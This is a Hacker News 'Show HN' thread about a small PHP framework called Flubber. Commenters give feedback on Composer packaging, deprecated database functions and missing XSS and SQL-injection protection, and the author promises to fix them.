
Show HN: Flubber – another PHP framework - madospace
http://flubber.co/
======
krapp
I think you may find people more receptive to something like this if it's
built as a Composer package.

One of the most important aspects of a PHP framework to me is the ease with
which you can add or swap out libraries - and being able to include things
with Composer and use its autoloading features would make a framework more
modular and easier to manage and extend in the future.

Having your own extension system is fine and perfectly valid, but a lot of
people have already invested in the existing package manager and PSR-0, and
will expect to be able to use it in for their projects.

As far as the rest of it, I would mention the use of the deprecated (and
highly vulnerable) sql_* functions and the lack of xss protection in the
templates but I assume changes to those would be forthcoming.

I like the lack of abstraction and the built-in MVC, though I think people
used to Rails-style routers in other frameworks like Laravel might wind up a
bit put off.

~~~
madospace
Thanks for the feedback! Next in the development pipeline I have few of these
issues. Basically this was evolved out of a small project (read Failed ). Next
version will include * Clean database layer * Packaging * Template engine *
xss protection (thanks to you!)

I have to consider your thoughts on extensions, in any case its the second
priority.

~~~
krapp
I know from personal experience how nasty raw PHP templating can be, in a
sprawling codebase where no one ever considered that simply echoing variables
that came from the database or from request variables might be a bad idea.

It makes even a simple framework more complicated but people use frameworks to
not have to be bothered about that sort of thing.

You may want to take a look at this before proceeding:
[https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet](https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet)

~~~
madospace
Definitely, Since it was all personal requirement It was designed like this. I
will start cleaning it up. and of course the cheat sheet will reduce lot of my
research.

------
nahhh
I think you should discontinue this piece of crap. It even probably (depends
on whether you perform some sort of sanitization before passing request) has
SQL injection vulnerability in your "todo" app example. And it looks like
piece of crap that would noone ever use.

~~~
madospace
Sure thing! I would not discontinue this. But I can fix this, give me some
time till I get these things clear. Thanks for the feedback though.

